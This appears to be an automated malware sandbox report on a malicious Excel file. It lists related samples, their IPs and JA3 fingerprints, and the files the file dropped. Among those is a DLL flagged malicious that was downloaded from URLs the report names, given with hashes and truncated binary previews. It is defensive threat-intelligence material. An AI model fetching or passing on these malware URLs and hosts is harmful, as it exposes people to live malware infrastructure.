	jufk0vrar.dll	Get hash	malicious	Browse	5.100.228.233
	anthon.exe	Get hash	malicious	Browse	145.131.21.142
	baf6b9fcec491619b45c1dd7db56ad3d.exe	Get hash	malicious	Browse	91.216.141.46
	p8LV1eVFyO.exe	Get hash	malicious	Browse	91.216.141.46
	IQtvZjIdhN.exe	Get hash	malicious	Browse	91.216.141.46
	148wWoi8vI.exe	Get hash	malicious	Browse	91.216.141.46
	plusnew.exe	Get hash	malicious	Browse	145.131.29.142
	List-20200731-79226.doc	Get hash	malicious	Browse	5.100.228.16
	LIST-20200731-88494.doc	Get hash	malicious	Browse	5.100.228.16
	Rep_20200731.doc	Get hash	malicious	Browse	5.100.228.16

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
51c64c77e60f3980eea90869b68c58a8	hiytvys.dll	Get hash	malicious	Browse	77.220.64.37
	l7rgi3xyd.dll	Get hash	malicious	Browse	77.220.64.37
	ymuyks.dll	Get hash	malicious	Browse	77.220.64.37
	hy9x6wzip.dll	Get hash	malicious	Browse	77.220.64.37
	jufk0vrar.dll	Get hash	malicious	Browse	77.220.64.37
	9681NLGKW2.exe	Get hash	malicious	Browse	77.220.64.37
	NaTdOM3rA7.exe	Get hash	malicious	Browse	77.220.64.37
	https://www.norspacehire.com/	Get hash	malicious	Browse	77.220.64.37
	SecuriteInfo.com.Trojan.Dridex.735.5073.dll	Get hash	malicious	Browse	77.220.64.37
	Document74269.xls	Get hash	malicious	Browse	77.220.64.37
	SecuriteInfo.com.Mal.EncPk-APV.3900.dll	Get hash	malicious	Browse	77.220.64.37
	ygyq4p539.rar.dll	Get hash	malicious	Browse	77.220.64.37
	b5tBjXlWsB.dll	Get hash	malicious	Browse	77.220.64.37
	SecuriteInfo.com.Generic.mg.69b1747072324f8f.dll	Get hash	malicious	Browse	77.220.64.37
	SecuriteInfo.com.Generic.mg.e2c08e17d07378e4.dll	Get hash	malicious	Browse	77.220.64.37
	auy0u4rzip.dll	Get hash	malicious	Browse	77.220.64.37
	a9e6937vcrar.dll	Get hash	malicious	Browse	77.220.64.37
	MSC printouts of outstanding as of 28954_12_09_2020.xlsm	Get hash	malicious	Browse	77.220.64.37
	s5kh50rfbzip.dll	Get hash	malicious	Browse	77.220.64.37
	g0gs7vm7arar.dll	Get hash	malicious	Browse	77.220.64.37
37f463bf4616ecd445d4a1937da06e19	P166824.htm	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	Client.vbs	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	Eps7The Mandalorian - Season 2.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	fast.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	CLIDSXX.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	SWIFT_COPY00993Payment_advic4555pdf.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	CNCDx23Q21.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	I1dO8QkyWW.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	T9tAui44l4.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	2aqzm7s4Un.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	E8Jkw96qFU.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	Scan_order.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	_00AC0000.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	SecuriteInfo.com.BehavesLike.Win32.Trojan.jc.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	SecuriteInfo.com.BehavesLike.Win32.Trojan.jc.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	SecuriteInfo.com.BehavesLike.Win32.Trojan.jc.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	SecuriteInfo.com.Trojan.GenericKD.44525883.8642.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	11998704458248.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	KeyMaker.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207
	SecuriteInfo.com.generic.ml.exe	Get hash	malicious	Browse	192.185.41.153 74.220.219.210 184.171.244.207

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	Microsoft Cabinet archive data, 58936 bytes, 1 file
Category:	dropped
Size (bytes):	58936
Entropy (8bit):	7.994797855729196
Encrypted:	true
SSDEEP:	768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
MD5:	E4F1E21910443409E81E5B55DC8DE774
SHA1:	EC0885660BD216D0CDD5E6762B2F595376995BD0
SHA-256:	CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
SHA-512:	2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............\|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..D..agaV..2.\|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.\|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..\|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....\|.....Q...'....X..C.....a;...Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	data
Category:	modified
Size (bytes):	326
Entropy (8bit):	3.114736388632894
Encrypted:	false
SSDEEP:	6:kKQwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:LkPlE99SNxAhUegeT2
MD5:	527B3D735C32E6F44F55FA98EE6F9CBE
SHA1:	1FD844F6B015C59224E38C742B586A36D65D3CAD
SHA-256:	9DDD9F80D02CD907672FF1ABB1251BA146F2552E81820AD6EF7B69C0ED087227
SHA-512:	E51192F2AE7E59A877A881051CEE8A9A5C9357353E5E42E7CFD2155923F3F31CF8A6490D33E77EF837D94B56080033073E9FF380DAE4B5EEC5C5CE625225CBD2
Malicious:	false
Reputation:	low
Preview:	p...... ........N.h&@...(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\6EC7F2B2-66F2-402E-AC2F-EE48EA399479 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	132942
Entropy (8bit):	5.372920679766178
Encrypted:	false
SSDEEP:	1536:LcQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:PrQ9DQW+zBX8P
MD5:	F36A0AED2615DBFD01E97A1C4D25729D
SHA1:	6C5271DA6D00A180291664C4077CE77E2F3D4D08
SHA-256:	1DBDCC9BB73C73C779F55B76ACBAECA0DD3A8D5191F56C4CDB3AC0D42F4ED986
SHA-512:	90CBBF81F55C9795585F6984607547B5E58CD236E29D3FA28E61DF6EE3BB92811A86DC018134B89B7B4FC9B6B5F8A775B875D3F074EE42BBC451B1D9695219EA
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-11T17:34:19">.. Build: 16.0.13706.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\613468AF.emf Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1408
Entropy (8bit):	2.270567557934206
Encrypted:	false
SSDEEP:	12:YnLmlzslqWuMap0Fol9l+EeQpN4lZsrBKlQzKlsl0u17u1DtDAcqitLMk+QCeJHo:Ync9640CXV34gNqXK7KhDDYB
MD5:	40550DC2F9D56285FA529159B8F2C6A5
SHA1:	DD81D41D283D2881BEC77E00D773C7E8C0744DA3
SHA-256:	DA935E8D60E93E41BCD7C3FBB1750EF3AC471C3AF78AFC8945DFBF31EB54A1E1
SHA-512:	FC354E4F37C9E1BA07DFC756F56A1ABE6A75230DEF908F34E43D35618B113A532E5B7C640F5B14BF75AC31003D8C66E06BA37A004E9357BF7896BD944A0514A0
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	....l................................... EMF........).......................`...1........................\|..F...........GDIC........L0.U......................................................................................................iii.......-.....................-.....................-.....................-.....................-.........!...............'...........................-.........!.........................$.............................-...............'.................$.............................-...............'.......................................................................................!...............................!...............................'...............iii.....%...........'.......................%...........'.......................%...........'.......................%...........'.......................%...........L...d...................................!..............?...........?................................"...........!...................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A760AE4.png Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PNG image data, 363 x 234, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2653
Entropy (8bit):	7.818766151665501
Encrypted:	false
SSDEEP:	48:EMJaE2jR4jEJ/ff6nMVNzNzHuuQoCpMTjOWhXP4/3dlsIfnaedCByM9x:VkjR4j6Hf6nGOWXPe/v3k/9x
MD5:	30D3FFA1E30B519FD9B1B839CC65C7BE
SHA1:	1EB0F0E160FF7440223A7FE46F08B503F03D3AFB
SHA-256:	89A25BF794658FD3FABB1F042BCC283497B78E0A94098188F2DED7587B0CA3DC
SHA-512:	88E3ABDADCBD7F308FCAED390A033F09208EAAD4053FE69DAA274CC14DD2BC815B4D63725C1EFEF3C592C1DEDE22A555DBF5303C096839F8338B2F6C9E0A3C50
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...k.........S.......tEXtSoftware.Adobe ImageReadyq.e<....PLTE.........KIK..................IDATx...b.0.E-......`.Y..~f.$.h...,..H..CLg.x<.h..k..k..k..k..k..k..k........:....$F...........E.....t.c?.~...q?.....!F....)<#$.l.......`..f.......;.......D]M.~..s.....h.}`.&{..X2.6.....s.;3>..o....0zn...])..8..;..rA..6..Xn"R..a.Bw..M....tw..mE.w....>....].._v...z...H.y..8{)Z...gu.C~.3...>]o..>_.F/....._7nt...c...n..lu..g..@......I...=.........?.9...."..Rc..b..lf.f..l.....#4...Fw.A{...&N.Z.'..2.;.?.h.\|..eZf..`..`..`..`......O..m.>n.-fS.........R...q.....F..D.....w...e..x.H.?.C........;.o!.)....@G..y..EY...5.>...'.}..4(..Aj)d.Pk....7vG........,G..RZ.#F...K.<.....'j...^r.(......"......FHN.D4.j.y..wJ_...H2.....lN....?.V?...z.K.......M..F... ..t...053..:..0.~.S-.30..'...Q..et..=...5.q.Ko..Y#...H.~...C..CLi.83..6_..B.DC..>?.]..fGo..X0}C.\|.@B..AJ.s.x...n..[.#WE....F.gv..i}..f}.....qG...G.O4....w6.x.L.J.......^._o:Za}..{.x.....F

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\bvw04lh5c[1].htm Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	10377
Entropy (8bit):	3.9408094438740293
Encrypted:	false
SSDEEP:	192:AXYZIf6bDYPMROzyPXgRIhw3NIr3yRrt4CXQKBnScZjyZT2c/w:prD09NbHs2c/w
MD5:	696B83AF006A2E8D3794BDF5ACED2586
SHA1:	7D10E68EDF37710196A3E0B3862758B5B35942D9
SHA-256:	894014C5CE2D12A82D7F9880563AF1B503D4B820921E86F0ADCBEF45EEB2AB27
SHA-512:	B6E5033638E54941496DAD28D58CF2EBA97B38063D5AEF280BD43428B324365352C83F2E30AD688F05E715667119C2A8604E44B794AA3137C469EB170526F92D
Malicious:	false
Reputation:	low
IE Cache URL:	https://bulksms.interweblimited.com/bvw04lh5c.zip
Preview:	..<!doctype html>.<html lang="en">. <head>. <title>Page Not Found</title>.. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.. Fonts -->. <link rel="dns-prefetch" href="//fonts.gstatic.com">. <link href="https://fonts.googleapis.com/css?family=Nunito" rel="stylesheet" type="text/css">.. Styles -->. <style>. html {. line-height: 1.15;. -ms-text-size-adjust: 100%;. -webkit-text-size-adjust: 100%;. }.. body {. margin: 0;. }.. header,. nav,. section {. display: block;. }.. figcaption,. main {. display: block;. }.. a {. background-color: transparent;. -webkit-text-decoration-skip: objects;. }.. strong {. font-weight: inherit;. }.. strong {.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\dvnrlttv[1].zip Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	318976
Entropy (8bit):	7.117521348606884
Encrypted:	false
SSDEEP:	6144:WH9O040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwN:i9O02Srnh0qEJC+Y218jdN
MD5:	7750BA949E4B090260827A4D8BE63EFC
SHA1:	EE0E268BFA0E49591DCF77F32D7DA94515D03C82
SHA-256:	8521E047F78CCF64777D40E44FB86A95F900E0ED594BB4F01CC6802FF412C536
SHA-512:	464C3AC243BB8B3BAD6419D10D5C9112DBB658E13256B722325BB42BCB11C464192683CB814568ECB431BF28AA3B58CBD7061F8C273B5EE3AC700948876EB315
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	https://osmosisecuador.com/dvnrlttv.zip
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{P._...........!...2.z...`.......&.......@...............................@..........................................................\|....................0..(....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2......p.......2..............@..@.data...H............4..............@....text4...R.......T...P.............. ..@.rsrc...\|........0..................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\u8wa3gh[1].zip Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	318976
Entropy (8bit):	7.117521348606884
Encrypted:	false
SSDEEP:	6144:WH9O040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwN:i9O02Srnh0qEJC+Y218jdN
MD5:	7750BA949E4B090260827A4D8BE63EFC
SHA1:	EE0E268BFA0E49591DCF77F32D7DA94515D03C82
SHA-256:	8521E047F78CCF64777D40E44FB86A95F900E0ED594BB4F01CC6802FF412C536
SHA-512:	464C3AC243BB8B3BAD6419D10D5C9112DBB658E13256B722325BB42BCB11C464192683CB814568ECB431BF28AA3B58CBD7061F8C273B5EE3AC700948876EB315
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
IE Cache URL:	https://sistacweb.com/u8wa3gh.zip
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{P._...........!...2.z...`.......&.......@...............................@..........................................................\|....................0..(....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2......p.......2..............@..@.data...H............4..............@....text4...R.......T...P.............. ..@.rsrc...\|........0..................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\AAD40000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	52617
Entropy (8bit):	7.8362489035534955
Encrypted:	false
SSDEEP:	1536:Hxz6aVXaPaG7zyju5b4Li1CruyP1BCL11k:HxtVKiG7eju58LICac1BEbk
MD5:	6DC240AA00B1E41064674DFC01B8FEA9
SHA1:	BDD68AE696BCF5421438AC66F9152D5E7FFD915A
SHA-256:	D7EB9B54A15BA9FD3703C3AA829C6D3C728CBE5C4CA0DBB79E48707CE1E9751C
SHA-512:	186ADE59B22271D147900A7436D6571AF102C29BE23F1C949952610FBDF31A8C462B452A3303D2ED513CF7760589A654B49C60A2F7226FF1A4D13789AC7E0E98
Malicious:	false
Reputation:	low
Preview:	..MO.0...+...\|]..{X.US...Y.....LZo.%...3NB.(...4M..}f&........iMA..d`.-......6.$Y..\Y..9B W.....G.!C......~3...4..:0.RY.y.[.c.......Z.b..&.1y......bv......4$...P...))x.@Ym.O..V..PZ....a.....K$...#&...d:...:...+@W..&O+...,K...Ee.~.K.~`.G.ie.v.zR7_s._{...N......x.5~B.(.b.ak.NG.h:...P...Ts...[...y+...}....^..0..3...R...2.'..8".=`..9.N.....C<.g.tI......,......f.\DY...g.S7.h/Z.....M>"&v_..........w.7.^4v.g...=.6.:wh.>J8....~"....&.t.P..Y{.m^.......PK..........!.........*.......[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Excel8.0\MSForms.exd Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	248808
Entropy (8bit):	4.292833774566677
Encrypted:	false
SSDEEP:	3072:XNvUjac9r8WZFVKKHSRDqBcA+FLM0Ar6t3s6bh:XNXc9YMFVTHSIcA+FLM0Awjbh
MD5:	DE945C0FB2ACF031540BEEE2A5984221
SHA1:	4C92748991711C2D54104FB78F571E319F5BE92D
SHA-256:	B72C4E89B154A06D2855B540F288DEB235B50DE8DD97E3E6D2B3C22A7F0CEEE1
SHA-512:	BBD97BBEC9FC618AC434FEF3820CEC137267EC4A6336D4A60F665700B2E25F6C48979DA680E6C3A0A4165A3988448248C3AF7FA9A916ACC0922D179C16C329B2
Malicious:	false
Preview:	MSFT................Q................................%......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................H...4............................................ ...............................x..lL..............T............ ..P........................... ...................................................

C:\Users\user\AppData\Local\Temp\dunjzsby.dll Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	318976
Entropy (8bit):	7.117521348606884
Encrypted:	false
SSDEEP:	6144:WH9O040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwN:i9O02Srnh0qEJC+Y218jdN
MD5:	7750BA949E4B090260827A4D8BE63EFC
SHA1:	EE0E268BFA0E49591DCF77F32D7DA94515D03C82
SHA-256:	8521E047F78CCF64777D40E44FB86A95F900E0ED594BB4F01CC6802FF412C536
SHA-512:	464C3AC243BB8B3BAD6419D10D5C9112DBB658E13256B722325BB42BCB11C464192683CB814568ECB431BF28AA3B58CBD7061F8C273B5EE3AC700948876EB315
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{P._...........!...2.z...`.......&.......@...............................@..........................................................\|....................0..(....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2......p.......2..............@..@.data...H............4..............@....text4...R.......T...P.............. ..@.rsrc...\|........0..................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\mkmanoo.dll Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	10377
Entropy (8bit):	3.9408094438740293
Encrypted:	false
SSDEEP:	192:AXYZIf6bDYPMROzyPXgRIhw3NIr3yRrt4CXQKBnScZjyZT2c/w:prD09NbHs2c/w
MD5:	696B83AF006A2E8D3794BDF5ACED2586
SHA1:	7D10E68EDF37710196A3E0B3862758B5B35942D9
SHA-256:	894014C5CE2D12A82D7F9880563AF1B503D4B820921E86F0ADCBEF45EEB2AB27
SHA-512:	B6E5033638E54941496DAD28D58CF2EBA97B38063D5AEF280BD43428B324365352C83F2E30AD688F05E715667119C2A8604E44B794AA3137C469EB170526F92D
Malicious:	true
Preview:	..<!doctype html>.<html lang="en">. <head>. <title>Page Not Found</title>.. <meta charset="utf-8">. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.. Fonts -->. <link rel="dns-prefetch" href="//fonts.gstatic.com">. <link href="https://fonts.googleapis.com/css?family=Nunito" rel="stylesheet" type="text/css">.. Styles -->. <style>. html {. line-height: 1.15;. -ms-text-size-adjust: 100%;. -webkit-text-size-adjust: 100%;. }.. body {. margin: 0;. }.. header,. nav,. section {. display: block;. }.. figcaption,. main {. display: block;. }.. a {. background-color: transparent;. -webkit-text-decoration-skip: objects;. }.. strong {. font-weight: inherit;. }.. strong {.

C:\Users\user\AppData\Local\Temp\xnaitann.dll Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	318976
Entropy (8bit):	7.117521348606884
Encrypted:	false
SSDEEP:	6144:WH9O040SSrnmrwc4oU2FmrEaoGAC+Y5H2V3B918juwN:i9O02Srnh0qEJC+Y218jdN
MD5:	7750BA949E4B090260827A4D8BE63EFC
SHA1:	EE0E268BFA0E49591DCF77F32D7DA94515D03C82
SHA-256:	8521E047F78CCF64777D40E44FB86A95F900E0ED594BB4F01CC6802FF412C536
SHA-512:	464C3AC243BB8B3BAD6419D10D5C9112DBB658E13256B722325BB42BCB11C464192683CB814568ECB431BF28AA3B58CBD7061F8C273B5EE3AC700948876EB315
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{P._...........!...2.z...`.......&.......@...............................@..........................................................\|....................0..(....................................................................................text....$.......&.................. ..`.rdata.......@.......*..............@..@.rdata3......P.......,..............@..@.2...........`.......0..............@..@.rdata2......p.......2..............@..@.data...H............4..............@....text4...R.......T...P.............. ..@.rsrc...\|........0..................@..@.reloc..(....0......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Mon Jan 11 16:34:36 2021, atime=Mon Jan 11 16:34:36 2021, length=16384, window=hide
Category:	dropped
Size (bytes):	904
Entropy (8bit):	4.643542105285058
Encrypted:	false
SSDEEP:	12:8GyXUpXduCH2KOxbR4SLxvGQlA+WrjAZ/DYbD0RSeuSeL44t2Y+xIBjKZm:8Gi9xGQcAZbcD037aB6m
MD5:	7894814E67A2899E1E1E1B50EAB393C0
SHA1:	BD41293FEA685ACA18DBE634308FE140E1760173
SHA-256:	92FC9048F95EDE782B43727F3EE0E5D8982F222C1F24C4CDBF45BC5977F3F1CB
SHA-512:	E28599FB7A985C9AB0D11989173EDF67A3E720AB06F04B9569A2344DA402ACEF915FFD72007282FD599899702914263292093DC0111C04428F572550234A4C80
Malicious:	false
Preview:	L..................F.............-..XL..@.......@....@......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..+R=.....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q\|<..user.<.......N..+R=.....#J....................a-j.j.o.n.e.s.....~.1.....+RS...Desktop.h.......N..+RS......Y..............>.......D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......376483...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	106
Entropy (8bit):	4.288085753919832
Encrypted:	false
SSDEEP:	3:oyBVomxWdxUNIVUYOhVdUNIVUYmxWdxUNIVUYv:djuSL1WLeSLC
MD5:	3A4CD3A9401D75DF179FD5850F863649
SHA1:	1036B9ABFAF918FB96990DA3DC6350DE5ADC5EAB
SHA-256:	6A59F34635BEEEC2999D038D85914250458F714CB546BD29FCFA3CCA1B0E73EF
SHA-512:	31AB0EE07F659FA4EAD5608CCF3C8E772918F24400EE013FE83838D8106BFDE4ED823B91D2C4464B108EB37F2FB15C71E9CB0EBC7AB3A2EFC469C253136D17D4
Malicious:	false
Preview:	Desktop.LNK=0..[misc]..sample20210111-01.LNK=0..sample20210111-01.LNK=0..[misc]..sample20210111-01.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\sample20210111-01.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:53 2020, mtime=Mon Jan 11 16:34:44 2021, atime=Mon Jan 11 16:34:44 2021, length=52604, window=hide
Category:	dropped
Size (bytes):	2190
Entropy (8bit):	4.658102608207041
Encrypted:	false
SSDEEP:	48:8VqizZCbl7W49lWB6pVqizZCbl7W49lWB6:84izJK4izJ
MD5:	4BA25CD43CC9ABE2E4929F1360199B74
SHA1:	C464AD67A57CA27D4E2CAA395C4FC535BFE23BBD
SHA-256:	B8F3FDD815DA59CB8A0112EB463894D7F7EFC7158AB6D2FFA72DB16ECCF9DE47
SHA-512:	2D1F5C8B4ADB254C98041B5D59B90B40A9C2E0D35E1CBDBC5A074B3656B39A48EB7C45317C310B16F3BC098773159A57A920024BA01639029611CEEF51A8F826
Malicious:	false
